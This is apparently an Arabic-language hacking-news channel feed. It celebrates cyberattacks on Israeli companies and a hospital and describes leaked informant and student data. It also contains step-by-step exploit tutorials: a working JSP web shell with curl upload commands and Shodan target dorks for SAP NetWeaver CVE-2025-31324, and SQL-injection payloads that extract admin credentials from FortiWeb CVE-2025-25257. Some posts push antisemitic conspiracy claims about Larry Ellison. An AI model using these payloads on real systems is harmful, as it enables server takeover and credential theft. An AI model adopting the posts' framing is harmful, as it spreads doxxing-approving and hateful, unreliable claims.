Hacker News

اختراق كامل أنظمة Merkaz HaGaz شركة الغاز الوطنية الصهـيونية بواسطة مجموعة الهاكرز أطفال غـزة #HackerNews #Gaza_Children_Hackers #CyberIsnaadFront

استهدف هجوم إلكتروني واسع النطاق شركة "MAYA"، التابعة لوزارة الدفاع والصناعات العسكرية الصهيونية، مما أدى إلى تعطيل أنظمتها. وفقًا لبيان صادر عن"جبهة الإسناد السيبرانية" فإن "MAYA" مسؤولة عن البحث والتطوير لدعم كبرى شركات الدفاع الصهيونية، بما في ذلك شركتا "إلبيت سيستمز" و"رافائيل"، اللتان تُعتبران الذراعين التقني والصناعي لوزارة الدفاع في النظام الصهيوني. وأفادت "جبهة الإسناد السيبرانية" أنها تمكنت خلال الهجوم الإلكتروني من تحديد بيانات شبكات من عدة شركات أخرى مرتبطة بوزارة الحرب تعمل تحت ستار الصناعات المدنية. كما كشف المتحدث باسم "جبهة الإسناد السيبرانية" أن المهاجمين حصلوا على وثائق وتصاميم تُظهر خطط النظام الصهيوني لتطوير وتصنيع معدات عسكرية متطورة جديدة. #HackerNews #CyberIsnaadFront

خطوات فنية لاستغلال الثغرة (للدراسة وفهم الآلية فقط) تحذير: عرض الخطوات لغرض التعليم والوعي فقط، وليس بغرض التطبيق الفعلي أو غير القانوني. 1. تحضير ملف خبيث الملف قد يكون Web Shell بلغة JSP مثلاً: text

<% if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    java.io.InputStream in = p.getInputStream();
    int a = -1;
    while((a=in.read())!=-1){
        out.print((char)a);
    }
    in.close();
} %>

2. إرسال طلب POST لتحميل الملف يمكن بأداة مثل curl: bash

curl -k -X POST \
 -F "file=@webshell.jsp" \
 https://target-sap-server/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader

3. الوصول للملف بعد التحميل قم بزيارة المسار الذي يُخزن فيه الملف (مثال): text

https://target-sap-server/irj/go/km/docs/webshell.jsp?cmd=whoami

سيتم تنفيذ الأمر وإرجاع النتيجة في الصفحة، ما يؤكد أن المهاجم أصبح لديه تحكم كامل بالخادم. #HackerNews #SAPNetWeaver #CVE_2025_31324

يعثر المهاجمون على منصات SAP NetWeaver المتأثرة من خلال عدة أساليب وأدوات تعتمد على المسح الشبكي وجمع المعلومات، وأهمها: استخدام محركات البحث المخصصة للأجهزة والخدمات (مثل Shodan, Censys): يبحث المهاجمون باستخدام كلمات مفتاحية (dorks) أو توقيعات معينة تكشف عن وجود واجهات SAP NetWeaver المكشوفة على الإنترنت، مثل البحث عن عنوان صفحة تسجيل الدخول أو لافتات http تشير إلى NetWeaver Application Server. أمثلة لعمليات البحث:

http.title:"SAP NetWeaver Application Server"

البحث ضمن نطاقات الشركات الكبرى أو عناوين المؤسسات الحكومية. فحص البورتات الشائعة الخاصة بـ SAP: منصات SAP NetWeaver غالبًا ما تكون متاحة على منافذ محددة مثل 50000، 50013، 8000، 8080 وغيرها. يمكن للأدوات مثل nmap إجراء مسح لهذه المنافذ والعثور على الأنظمة المكشوفة. استخدام أدوات كشف نقاط النهاية وضعف الحماية: أدوات المسح (scanner) مثل Onapsis، أو حتى أدوات مفتوحة المصدر مثل Metasploit modules، تسجل نقطة نهاية metadatauploader أو صفحة Visual Composer المفتوحة. تحليل الأدلة من الشهادات أو رؤوس HTTP: أحيانًا تكشف رؤوس (Headers) http أو حتى الشهادات الرقمية عن إصدار السيرفر وهويته. المعلومات المسربة أو فهارس الإنترنت: قد توفر بعض الفهارس أو تسريبات البيانات عناوين أنظمة SAP مكشوفة أو كلمات سر ضعيفة أو افتراضية. شرح الثغرة بالتفصيل المكون المتأثر: SAP NetWeaver Application Server Java، وحدة Visual Composer. طريقة الاستغلال: المشكلة تكمن في غياب التحقق من التفويض (Missing Authorization Check) عند نقطة النهاية /developmentserver/metadatauploader، حيث يسمح للمهاجمين بإرسال طلبات POST تحتوي على ملفات خبيثة (مثل Web Shell أو تطبيقات JAR أو ZIP). يقوم المهاجم بإرسال طلبات POST لاستغلال ثغرة مثل CVE-2025-31324 عادة عبر أدوات متخصصة تتيح له صياغة وإرسال طلبات HTTP بشكل يدوي أو تلقائي، وأشهر الأدوات المستعملة: أدوات الهجوم لإرسال طلبات POST curl أداة ينتجها نظام لينكس (ومتوفرة لكل الأنظمة)، تتيح إرسال طلبات HTTP/HTTPS حسب الرغبة. مثال استخدام: bash

curl -k -X POST -F "file=@webshell.jsp" https://target-sap-server/metadatauploader

يمكن بها تحديد نوع المحتوى، ملف الإرسال، إعداد رؤوس الطلب وكل التفاصيل المطلوبة. Burp Suite أداة اختبار اختراق متقدمة، تتيح للمهاجم أو مختبر الأمن إجراء وفحص وتعديل أي طلب HTTP (GET/POST). يمكن تعديل الطلبات مباشرة عبر واجهة المستخدم أو استخدام أدوات التكرار (Repeater/Intruder) لإرسال عدة طلبات مختلفة وملاحظة الاستجابة. Postman تطبيق متكامل لإرسال طلبات HTTP وتطوير واجهات API. يتيح إرسال ملفات، تعديل الحقول والرؤوس، وتحليل الاستجابات. يستخدم غالبًا في الاختبار اليدوي لرؤية الاستجابة وتكرار الطلبات. أدوات برمجية أو سكربتات بلغة Python/JavaScript المهاجم المتقدم قد يكتب سكربت مخصص باستخدام مكتبات مثل requests (Python) أو axios (JavaScript) لإرسال طلبات POST تلقائية حسب سيناريو الهجوم. مثال عملي باستخدام curl:

bash
curl -k -X POST -F "file=@webshell.jsp" https://target-sap-server/metadatauploader

هكذا يرسل المهاجم ملف خبيث إلى مسار نقطة النهاية في SAP NetWeaver، ويفحص استجابة الخادم للتأكد من نجاح الهجوم. ما يحدث عند الاستغلال: النظام يقبل تحميل الملف دون أن يتحقق من صلاحية المستخدم أو يفحص الملف بشكل آمن، ما يؤدي إلى إمكانية تنفيذ كود برمجي ضار وتحكم كامل بالخادم (RCE) عن بُعد. درجة الخطورة: CVSS 10/10 (حرج جدًا)، حيث يمكن للمهاجمين التحكم الكامل بالنظام وسرقة بيانات حساسة، أو تعطيل أنظمة الأعمال الحرجة. تأثير الثغرة وأهداف الهجوم انتشار واسع: هناك أكثر من 1200 نظام SAP NetWeaver مكشوف للإنترنت حول العالم معرض للخطر. أمثلة الاستغلال: تحميل Web Shell خبيث إلى المجلد j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/ ومن ثم الوصول اليه وتنفيذ أوامر عبر GET. سرقة بيانات العملاء الحساسة أو المالية، تعطيل الأنشطة التجارية، الحركة الجانبية داخل الشبكة واختراق أنظمة أخرى. سير العملية: المهاجم يحضّر ملفًا خبيثًا (مثلاً: Web Shell، ملف JAR أو ZIP مدمج بكود ضار). يرسل هذا الملف كجزء من طلب HTTP POST إلى مسار مثل:

/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader

خادم SAP NetWeaver، بسبب خطأ غياب التحقق، يقبل الملف ويقوم بتخزينه وتشغيله كجزء من نظامه. المهاجم يتبع ذلك بطلب HTTP GET إلى ملف الـ Web Shell (أو ينفذ ملف جافا أو أكواد أخرى)، ليبدأ التحكم الكامل بالنظام. يمكن الآن للمهاجم تنفيذ أي تعليمات، سرقة بيانات، أو التحرك داخل الشبكة.

ثغرة يوم الصفر CVE-2025-31324 في منصة SAP NetWeaver هي ثغرة حرجة تتيح تنفيذ تعليمات برمجية عن بعد (RCE) دون الحاجة لأي مصادقة، عبر استغلال نقطة ضعف في ميزة تحميل بيانات التعريف (Metadata Uploader) في وحدة Visual Composer. منصة SAP NetWeaver هي بنية تقنية متكاملة من إنتاج شركة SAP، وتُستخدم كأساس لبناء وتشغيل تطبيقات أعمال المؤسسات. تجمع بين وظائف إدارة قواعد البيانات، تشغيل التطبيقات، تكامل النظم، تطوير الخدمات، وواجهة المستخدم في نظام واحد، وتوفر أدوات لتكامل التطبيقات والمعلومات عبر بيئات وأنظمة مختلفة. تُعد منصة NetWeaver قلب أنظمة SAP الحديثة، وتتيح: تشغيل تطبيقات SAP مثل ERP وCRM وBI على سيرفر واحد بكل مرونة. ربط مختلف التطبيقات والأنظمة الداخلية والخارجية في المؤسسة (Integration). تطوير ونشر تطبيقات الويب والخدمات الذكية باستخدام Java وABAP. إدارة عمليات الأعمال والبيانات من خلال بوابات مركزية وتكامل آمن.

باختصار هي منصة تقنية لتشغيل، تطوير، وتكامل تطبيقات الأعمال الكبرى في المؤسسات، وهي أساس منظومة SAP للشركات حول العالم.

#HackerNews #SAPNetWeaver #CVE_2025_31324

النظام، بسبب سوء التحقق وضعف التعقيم، يقوم بدمج هذه الشيفرة مباشرة في استعلام SQL يُنفذ على قاعدة البيانات الخلفية، ما يسمح بتنفيذ أوامر مثل استخراج بيانات حساسة أو تعديل جداول البيانات.​ هذه الثغرة لا تتطلب أي نوع من التوثيق أو بيانات اعتماد، ويكفي وجود النظام على الإنترنت بوضع غير مصحح ليتم اختراقه عن بعد بعملية واحدة.​ كما يستطيع المهاجم استخدام منصة Fabric Connector لإدخال أوامر SQL متقدمة مثل SELECT … INTO OUTFILE لوضع شيفرات تنفيذية داخل النظام وفتح الباب لتنفيذ أكواد عن بعد (Remote Code Execution).​ مثال عملي على استغلال ثغرة FortiWeb عبر براميتر التوكن هو إرسال طلب HTTP أو HTTPS لمكون Fabric Connector بالصيغة التالية: text

POST /api/fabric/authenticate HTTP/1.1
Host: target-fortiweb.example.com
Content-Type: application/json

{
"token": "1' OR '1'='1"
}

في هذا المثال، تم إدخال الشيفرة الخبيثة "1' OR '1'='1" بدل قيمة التوكن العادية. بدلاً من فحص رمز توكن حقيقي، ينفذ النظام الاستعلام التالي على قاعدة البيانات: text

SELECT id FROM fabric_user.user_table WHERE token = '1' OR '1'='1'

وهذا يؤدي إلى إرجاع كل الصفوف من الجدول لأن شرط '1'='1' دائماً صحيح، ما يسمح باختراق الحسابات أو الوصول للبيانات بدون أي توثيق.​ يمكن للمُهاجمين أيضاً إدخال شيفرات أكثر تعقيداً مثل: text

"token": "1' UNION SELECT username, password FROM admin_users --"

لينفذ استعلاماً يسرّب أسماء المستخدمين وكلمات المرور من جدول آخر ضمن نفس الاستعلام الأصلي، أو حتى تنفيذ أوامر إضافية إن كانت القاعدة تسمح بذلك.​ توضح هذه الأمثلة كيف يمكن استبدال المدخلات الشرعية بقيم خبيثة في براميتر مثل التوكن أو أي حقل مدخل مستخدم آخر، ويؤدي الاستغلال إلى تنفيذ شيفرة SQL مباشرة بدون مصادقة.مثال عملي للاستغلال يكون عادة من خلال إرسال طلب HTTP حيث يتم استبدال قيمة التوكن (token) بقيمة تحتوي شيفرة SQL خبيثة بدل القيمة الشرعية. على سبيل المثال:​ text

POST /api/fabric/authenticate HTTP/1.1
Host: victim-site.com
Content-Type: application/json

{
"token": "1' OR '1'='1"
}

في هذه الحالة، يتم إدراج السلسلة "1' OR '1'='1" داخل استعلام SQL مثل: text

SELECT id FROM fabric_user.user_table WHERE token = '1' OR '1'='1'

وهذا يؤدي إلى تنفيذ الاستعلام بشكل يلتف على تحقق الهوية ويعرض قاعدة البيانات بالكامل للمهاجم بدون مصادقة.​ من الأمثلة الأخرى لاستخدام الحقول المختلفة في الهجوم، قد يستخدم المهاجم الشيفرة التالية للحصول على كلمات المرور: text

"token": "' UNION SELECT username, password FROM users --"

وهكذا يتم استغلال ثغرة الإدخال دون فحص أو مصادقة، ويستطيع أي مهاجم التحكم في النظام فقط عبر تصميم مدخل (مثل التوكن) يحوي تعبيرات SQL خبيثة داخل الحقل المطلوب.​ #HackerNews #Fortinet #FortiWeb #CVE202525257

ـ Fabric Connector هو مكون برمجي يُستخدم كوسيط أو جهة تكامل، هدفه الأساسي ربط جدار حماية التطبيقات FortiWeb مع بقية حلول Fortinet الأخرى الموزعة في البيئة المؤسسية، مثل جدران FortiGate، أدوات FortiManager، أو حتى خدمات سحابية خارجية كـ AWS.

وظيفة Fabric Connector في FortiWeb يقوم بربط FortiWeb مع أنظمة إدارة الشبكة (مثل FortiManager)، أو مع خدمات سحابية خارجية مثل AWS وAzure وSDN، بهدف نقل وتزامن السياسات الأمنية، ومعلومات العناوين الديناميكية والبيانات الآنية من مختلف نطاقات البنية التحتية الرقمية.​ يُستخدم لأتمتة تحديث سياسات الحماية (مثل القوائم البيضاء والسوداء للعناوين أو التطبيقات)، بناءً على تغييرات تحدث في الشبكة أو التطبيقات بشكل فوري ودون تدخل بشري. يتيح هذا التكامل حماية متقدمة وديناميكية حسب الواقع اللحظي لتدفق البيانات والهجمات.​ يتم إعداد المكون عبر واجهة برمجة تطبيقات (API)، حيث يمكن إرسال واستقبال طلبات HTTP أو HTTPS إليه لإجراء عمليات تحقق أو تزامن بيانات أو تحديث سياسات الحماية.​ سبب الاستهداف والثغرة نقطة الضعف المعروفة (CVE-2025-25257) ظهرت في جزء من تنفيذ التحقق من الرموز (token) عبر دالة مثل get_fabric_user_by_token، والتي تدمج مدخل المستخدم في استعلام SQL مباشر بدون تعقيم أو تحقق، ما فتح المجال لاستغلالها من أي مهاجم عن طريق إرسال طلبات مخصصة عبر الإنترنت.​ المدخل المستخدم (مثل token أو أي معلمة أخرى من الطلب) يتم إدخاله في النظام عبر هذه الواجهة، ويتم التعامل معه مباشرة في قاعدة البيانات بدون مصادقة وبشكل يسمح بتنفيذ شيفرات SQL خبيثة.​ بهذا يكون Fabric Connector وسيلة للتكامل والأتمتة بين أنظمة Fortinet، لكنه أصبح نقطة خطر نتيجة سوء تنفيذ التحقق من المدخلات البرمجية فيه، حيث يمكن استغلاله بإرسال طلبات HTTP/HTTPS عبر الإنترنت لتنفيذ هجمات واختراقات عن بعد بدون مصادقة.مكون Fabric Connector هو برنامج وسيط داخل FortiWeb يُستخدم كحلقة وصل بين جدار حماية التطبيقات (WAF) ومنظومة Fortinet الأمنية، مثل أربطة الشبكة SDN أو منصات السحابة أو منتجات FortiGate، ويسمح بتكامل السياسات الأمنية بشكل تلقائي عبر واجهة برمجة التطبيقات (API).​ يستقبل هذا المكون طلبات HTTP/HTTPS من أنظمة التحكم أو خدمات الإدارة أو حتى من مستخدمين عبر الإنترنت لتنفيذ عمليات تزامن أو توثيق أو تحديث سياسات، ويعتمد على دوال مثل get_fabric_user_by_token التي تتعامل مباشرة مع مدخلات المستخدم مثل token من الطلب، ما يجعل أي مدخل غير مصحح مدخل خطر قابل للاستغلال بحقن أوامر SQL مباشرة في قاعدة البيانات الخلفية بدون مصادقة أو تحقق.​ ببساطة هو طبقة تكامل وأتمتة بين FortiWeb وبقية حلول البنية الأمنية من Fortinet وشركائها، وتظهر الثغرة عند إمكانية إرسال مدخلات خبيثة له عبر واجهة الإنترنت لتنفذ داخل النظام المركزي. آلية الهجوم خطوة بخطوة: المهاجم يوجّه طلب HTTP/HTTPS إلى واجهة Fabric Connector في FortiWeb، ويضع في أحد حقول الطلب (مثل براميتر التوكن أو أي مدخل مستخدم آخر) شيفرة SQL خبيثة بدل بيانات اعتيادية. مثال عملي للأدوات التي يستخدمها المهاجم: أدوات اختراق وتوجيه الطلبات HTTP مثل Burp Suite، OWASP ZAP، Postman، curl، أو حتى نصوص Python مثل requests. صيغة الطلب تكون مثل: text

POST /api/fabric/authenticate HTTP/1.1
Host: target-fortiweb.example.com
Content-Type: application/json

{
"token": "1' OR '1'='1"
}

أو: text

{
"token": "' UNION SELECT username, password FROM admin_users --"
}

هذه المدخلات يتم تنفيذها كاستعلام SQL داخل قاعدة البيانات بدون أي تحقق أو تعقيم، ما يؤدي لاختراق النظام أو تسريب بياناته بشكل كامل.​ أي شخص يمكنه العمل بهذه الأدوات حتى من خارج نطاق المؤسسة بمجرد أن النظام مكشوف للإنترنت بوضع غير محمي.كيف يقوم المهاجم بتوجيه طلب HTTP/HTTPS إلى واجهة Fabric Connector في FortiWeb؟ العملية كما يلي: المهاجم يكتب أو يُعدل طلب HTTP/HTTPS بحيث يوجهه إلى عنوان واجهة Fabric Connector في FortiWeb (مثلاً إلى endpoint مثل /api/fabric/authenticate أو أي نقطة ربط أخرى). في أحد حقول الطلب (عادةً حقل التوكن أو مدخل المستخدم)، يضع شيفرة SQL خبيثة بدل البيانات العادية (مثل "token": "1' OR '1'='1"). يرسل الطلب باستخدام أدوات مثل Burp Suite، OWASP ZAP، Postman، curl، أو حتى سكربتات Python بالأداة requests. النظام يقوم بدون تحقق أو تعقيم بإدراج مدخل المهاجم داخل استعلام SQL ويُنفذه في قاعدة البيانات مباشرة. هذا يسمح للمهاجم بالحصول على بيانات (مثل كلمة السر أو بيانات المستخدم)، أو تنفيذ أوامر متقدمة على قاعدة البيانات، أو حتى رفع الامتيازات والتحكم بالنظام.

ثغرة Fortinet FortiWeb الحرجة، تعتبر حالياً الأخطر بين ثغرات SQL Injection النشطة بسبب سهولة استغلالها وشمولية تأثيرها على أنظمة المؤسسات الحساسة. جدار حماية التطبيقات Fortinet FortiWeb هو جهاز أو برنامج من شركة Fortinet مخصص لحماية تطبيقات الويب (Web Application Firewall)، ويُستخدم من قبل المؤسسات الكبرى مثل البنوك، المؤسسات المالية، الجهات الحكومية والشركات، لحماية التطبيقات والمواقع الإلكترونية على الإنترنت من الهجمات السيبرانية، خاصة هجمات SQL Injection وXSS وسوء التكوين وغيرها. تم اكتشاف الثغرة في يوليو 2025 وحملت الرمز CVE-2025-25257 وتؤثر على نظام FortiWeb ، ويستطيع أي مهاجم إرسال طلبات HTTP أو HTTPS مصممة خصيصًا إلى مكون Fabric Connector في FortiWeb، لتنفذ استعلامات SQL مباشرة في قاعدة البيانات الخلفية بدون الحاجة لأي بيانات اعتماد، والسبب هو أن النظام كان يُدرج مدخلات المستخدمين مباشرةً داخل استعلامات SQL دون التحقق من صحة أو تعقيم هذه المدخلات. يستغل المهاجم الثغرة لسرقة بيانات سرية، رفع الامتيازات، وتخريب أنظمة الحماية أو تعطيل خدمات المؤسسة بالكامل. #HackerNews #Fortinet #FortiWeb #CVE202525257

عيوننا ستبقى دائما على القدس #HackerNews

موقع "Whos A Rat" هو أكبر قاعدة بيانات للمخبرين السريين "الخونة" الذين يعملون في الخفاء كمقدمي معلومات للحكومة الأمريكية أو المدعين العامين والشرطة، تحتوي قاعدة البيانات على معلومات مخبري الشرطة، ومخبري السجون، وعملاء وجواسيس إدارة مكافحة المخدرات السريين. يتمتع أعضاء الموقع بإمكانية الوصول الكامل لمعلومات أكثر من 5000 ملف تعريف للمخبر، والعديد منها يحتوي على صورة للمخبرين (البعض منهم أعضاء عصابات وتجار مخدرات قدموا معلومات مقابل تخفيف أو إلغاء أحكام قضائية)، بالإضافة إلى وثائق ومعلومات سرية مثل اتفاقيات التعاون، والمنطقة التي يقيم فيها الخائن، ووكالة إنفاذ القانون المحددة (الشرطة المحلية، أو إدارة مكافحة المخدرات، أو الوكالة الحكومية) التي يتواطأ معها المخبر. أسس الموقع المواطن الأمريكي شون بوتشي وهو محمي بموجب القانون، حسب مؤسسه فمن حق العامة الاطلاع على معلومات المخبرين ووثائق المحاكم التي توضح تفاصيل المعلومات التي قدمها المخبرون. #HackerNews

تعرض موقع "Whos A Rat" لعملية اختراق أدت للكشف عن 30,000 سجل، الموقع يعتبر أكبر قاعدة بيانات للمخبرين السريين في الولايات المتحدة. وفقًا للجهة المُخترقة، تحتوي قاعدة البيانات على سجلات لـ 30,000 مستخدم ومخبر. البيانات المُخترقة واسعة النطاق والضرر، ولا تقتصر على معلومات المستخدمين الشخصية فحسب، بل تشمل أيضًا ملفات تعريف مفصلة للمُخبرين المدرجين في الموقع. وتتضمن البيانات ما يلي:

معرفات المستخدمين وكلمات المرور الاسم الأول والأخير والأسماء المستعارة عناوين البريد الإلكتروني أرقام الهواتف العناوين الفعلية الكاملة، بما في ذلك اسم الشارع والمدينة والولاية والرمز البريدي البيانات الديموغرافية، بما في ذلك العمر والجنس والعرق الأنشطة غير القانونية المزعومة والمواد المُستخدمة أوصاف مفصلة لأنشطة المُخبرين السجلات الجنائية صور الأفراد تقييمات المصداقية وكالات إنفاذ القانون ذات الصلة بيانات الاتصال بالمحامين والأشخاص الآخرين ذوي الصلة

#HackerNews

تعرضت منظمة الاتحاد الوطني للطلاب الإسرا*ئيليين (NUIS) لاختراق كبير للبيانات الخاصة بالطلاب، حيث نشر أحد الهاكرز على منتدى تسريبات أنه حصل على بيانات من الهيئة الطلابية التي تمثل 400 ألف طالب داخل الكيان الصهـيوني. وفقًا للهاكر فإن 132 ألف صف من البيانات قد سُرقت من قاعدة بيانات المنظمة، وهي معروضة للبيع، تتضمن البيانات المُخترقة مجموعة واسعة من المعلومات الشخصية والتجارية الحساسة. تحتوي الملفات المُسربة على ما يلي: الأسماء الكاملة عناوين البريد الإلكتروني أرقام الهواتف العناوين الفعلية معلومات التعريف الشخصية للطلاب الحساب المصرفي للمورد وتفاصيل الاتصال السجلات المالية الداخلية ودفاتر الحسابات اتفاقيات الموردين والوثائق التشغيلية #HackerNews

تبرع إليسون بأكثر من 350 مليون دولار لـ "معهد توني بلير للتغيير العالمي"، مما جعله أكبر مُتبرع، وساعده على التوسع عالميًا، وفقًا لتحقيق جديد أجرته صحيفة نيو ستيتسمان وتقارير لايت هاوس. وأفادت هذه المنافذ أن معهد توني بلير أصبح فعليًا فرعًا من شركة أوراكل، حيث يشغل مستشارو بلير الرئيسيون مناصب في مجلسي إدارة أوراكل ومعهد توني بلير، و رشح الرئيس الأمريكي ترامب شخصية توني بلير المقرب من إليسون لإدارة شؤون غزة بعد وقف الحرب، وفق بنود صاغها صهر ترامب اليهودي جاريد كوشنر، لتحقيق أهداف ونبوءات سعى إليها الصهـاينة منذ سنوات في غزة عسقلان. تريد أوراكل بمساهمة وشراكة مع عمالقة التكنولوجيا الأمريكية التي لديها رأس وقدم في الكيان بناء استثمارات ضخمة في الحوسبة السحابية وجمع البيانات والاتصالات ومرتبطة بالذكاء الاصطناعي في غزة، تحت غطاء ما يسمى بإعادة إعمار غزة، الهدف الأول منها استعماري إقتصادي لإستعباد البشر، أما الهدف الثاني فهو شيطاني معقد لا تظهر كل جوانبه ويصعب إقناع الأغلبية به. #HackerNews #الهوية_الرقمية #DigitalID #غزة

كشفت رسائل البريد الإلكتروني المسربة من مجموعة القرصنة "حنظلة" منذ عام والتي وصلت أخيرًا لوسائل الاعلام الأمريكية، وأظهرت كيف لعب رجل الأعمال الأمريكي اليهودي لاري أليسون "مالك شركة أوراكل" دورًا كبيرا منذ عام 2015 في نسج خيوط السياسة الأمريكية الداعمة للكيان الصهـيوني، بتمويل حملة السيناتور "مارك روبيو" الانتخابية وصولا لمنصبه كوزير للخارجية في عهد ترامب. الرسائل المسربة والتي تعود لبداية عام 2015 لمراسلات بين لاري أليسون وسفير الكيان السابق في الأمم المتحدة "رون بروسور" وهو يشغل حاليا منصب سفير الكيان في ألمانيا، وكيف تم الاتفاق على تمويل حملة مارك روبيو وتوضيفه كداعم قوي للكيان في الحكومة الأمريكية. في الـ 30 أبريل، أرسل "إليسون" رسالة إلى "بروسور" بعد تناول عشاء رفقة مارك روبيو . ورتب له لقاء مع صديقه المقرب توني بلير"،

واصفًا اللقاء بالناجح: "سيكون ماركو صديقًا رائعًا لإسر*ائيل"

. #HackerNews #الهوية_الرقمية #DigitalID #غزة

المعركة القادمة التي لا مفر منها هي معركة "الهوية الرقمية"، على كل شخص حر أن يحارب ويقاوم لأجل ما تبقى من حرية للإبقاء على الخصوصية، إذا سمحت بوضع القيود في يديك والشريط اللاصق على فمك والتحكم في أموالك، فماذا بقي لك. في مكالمة هاتفية مع المستثمرين العام الماضي، قال رجل الأعمال الأمريكي لاري إليسون يهودي الديانة صهـيوني المذهب ومالك شركة أوراكل:

"إن المراقبة الجماعية أمر لا مفر منه، وستُبقي المواطنين على "أفضل سلوك"، وقال إليسون: " سنُشرف على كل ضابط شرطة طوال الوقت، وفي حال وجود أي مشكلة، سيُبلغ الذكاء الاصطناعي عنها ويُبلغ الشخص المختص. سيُحافظ المواطنون على سلوكهم الجيد لأننا نُسجل ونُبلغ باستمرار عن كل ما يحدث".

في 26‏ سبتمبر 2025 كشف كير ستارمر رئيس وزراء بريطانيا عن خطط لفرض هوية رقمية إلزامية كشرط للعمل في بريطانيا. #HackerNews #الهوية_الرقمية #Digitalidentity

تعرضت منصة التمويل اللامركزي (DeFi) التي تحمل اسم "أبراكادابرا" Abracadabra لعملية اختراق أدت لاسنزاف ما يقارب 1.7 مليون دولار من المنصة. المخترق تمكن من استغلال ثغرة أمنية في عقد Abracadabra الذكي. حيث تلاعب بمتغيرات عقد المنصة، مما سمح له بتجاوز فحص الملاءة المالية (Solvency). سمح له هذا الاستغلال باقتراض أصول تتجاوز الحد المسموح به، مما أدى إلى خسارة فادحة للبروتوكول. الثغرة حدثت بسبب استغلال المهاجم خلل في منطق العقد الذكي، خطأ تسلسلي في دالة cook function في أبراكادابرا، المصممة لتنفيذ عمليات متعددة في معاملة واحدة. من خلال إجراءين محددين. الأول المسمى "الإجراء 5"، فعّل عملية اقتراض لاجتياز اختبارات Solvency. أما الثاني المسمى "الإجراء 0"، فقد تجاوز خطوة التحقق بتجاوز علامة التحقق. كرر المهاجم هذه العملية عبر ستة عناوين مختلفة، وسرق أكثر من 1.79 مليون رمز MIM. بعد الاستغلال سارع فريق أبراكادابرا إلى اتخاذ إجراءات لمنع المزيد من الأضرار. و أوقفوا جميع العقود على المنصة مؤقتًا للحد من الخسائر الإضافية. #HackerNews #Abracadabra #DeFi

أعلنت مجموعة القرصنة Qilin مسؤوليتها عن الهجوم، وأنها تمكنت من الوصول إلى ما يصل إلى 8 تيرابايت من البيانات، بما في ذلك معلومات طبية حساسة. وأمهل المهاجمون المستشفى 72 ساعة لدفع الفدية وإلا سيتم نشر الملفات المسروقة علنًا. كما أضافت المجموعة أنها اخترقت "مئات الخوادم ونقاط النهاية" في المستشفى.

وأعلنت وزارة الصحة الصهـيونية والهيئة الصهـيونية للأمن السيبراني، أنها رصدت محاولة الهجوم خلال يوم "الغفران"، ولا تزال السلطات تحقق فيما إذا كانت المعلومات قد سُرِبَت. وبصفته مركزًا طبيًا حكوميًا، يخضع مستشفى عساف هاروفة للحماية المباشرة للهيئة الصهـيونية للأمن السيبراني.

#HackerNews #Qilin

تعرض مركز شامير الطبي المعروف باسم "عساف هاروفة" وهو أكبر مجمع طبي في الكيان الصهـيوني لهجوم إلكتروني، أدى إلى توقف نظام السجلات الطبية الذي تستخدمه مستشفيات في جميع أنحاء الكيان، وهددت مجموعة Qilin بنشر معلومات المرضى ما لم يتلقوا فدية قدرها 700 ألف دولار خلال 72 ساعة من نشر البيان. وجاء في مذكرة الفدية التي وجهت لنتنياهو وزوجته (بيبي وسارة) :"خلال عملية الاختراق، قمنا باستخراج ما يقارب 8 تيرابايت من البيانات الحساسة والسرية. تتضمن هذه البيانات سجلات المرضى، والاتصالات الداخلية، ومعلومات تشغيلية بالغة الأهمية. نطالب بفدية لمنع نشر هذه المعلومات علنًا". #HackerNews #Qilin